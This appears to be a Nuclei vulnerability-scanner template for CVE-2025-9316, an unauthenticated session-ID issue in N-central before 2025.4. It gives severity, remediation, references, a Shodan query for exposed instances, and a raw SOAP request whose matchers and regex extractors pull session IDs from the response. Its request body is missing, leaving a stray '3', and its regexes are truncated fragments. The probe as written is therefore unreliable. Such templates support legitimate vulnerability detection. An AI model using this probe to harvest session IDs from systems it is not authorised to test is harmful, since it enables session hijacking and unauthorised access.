id: CVE-2025-9316 info: name: N-central - Authentication Bypass author: DhiyaneshDK,horizon3ai severity: medium description: | N-central < 2025.4 can generate sessionIDs for unauthenticated users This issue affects N-central: before 2025.4. impact: | Attackers can hijack sessions without authentication, potentially leading to unauthorized access. remediation: | Update to version 2025.4 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-9316 - https://github.com/horizon3ai/n-able_n-central_xxe_file_read/blob/main/ncentral_xxe_file_read.py metadata: verified: true max-request: 2 shodan-query: http.title:"N-central Login" tags: cve,cve2025,n-central,session-leak,vkev http: - raw: - | POST /dms/services/ServerUI HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml Soapaction: "" 3 matchers-condition: and matchers: - type: word words: - "SessionID" - "sessionHelloResponse" condition: and - type: status status: - 200 extractors: - type: regex part: body group: 1 regex: - ']*>(\d+)' - '(\d+)' - '(\d+)' # digest: 490a0046304402206c171624ce3f00e1d73d26724772a32058b51c552e7fa45148417ab15d94d1f902206e4a888fc7ffb3f689f69e3817509f8fdb74bd6479cd6c341fbf51d621f30613:922c64590222798bb761d5b6d8e72950